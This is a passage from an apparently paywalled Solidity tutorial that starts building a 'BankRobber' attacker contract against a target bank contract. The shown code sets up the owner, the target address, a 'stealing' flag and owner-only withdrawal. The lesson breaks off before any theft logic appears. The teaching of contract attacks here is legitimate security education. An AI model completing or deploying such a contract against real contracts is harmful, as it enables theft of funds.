Subscribe to get access to this video

and the whole library of videos, sample code, and tutorials.

BankRobber Script

Let’s write our BankRobber class.

We’ll start by creating a new contract, which three properties:

  • the address of the owner, that is, the controlling attackers address
  • the address of the bank, which is our target
  • and a boolean, which stores if we currently are stealing from the bank
pragma solidity ^0.4.11;

contract BankRobber {
  address public owner;
  address public targetBankAddress;
  bool stealing;

Whoever creates the BankRobber becomes the owner, so we set the owner to msg.sender in the constructor. If you’re unfamiliar with this pattern, checkout the video Contract Owner and require in the Million Ether Homepage.

  function BankRobber() {
    owner = msg.sender;
  }

Now we’ll write a function to set the initial target address.

  function setTargetAddress(address target) {
    require(msg.sender == owner);
    targetBankAddress = target;
  }

You could do this in the constructor, or even hard code it if you want. Notice that we only want the owner to be able to change this value, so we require that the msg.sender is the owner.

Next, when our robber has stolen funds, we want to be able to transfer them out. So let’s write a withdraw function:

  function withdraw() {
    require(msg.sender == owner);
    owner.transfer(this.balance);
  }

Again, we only want the owner to be able to call this function, so we check for that in the first line. Next we transfer, to the owner, the balance of this contract. That is, we send the owner all of the funds the BankRobber controls.

 

Subscribe to get the full text of this lesson

and the entire library of videos, sample code, and tutorials.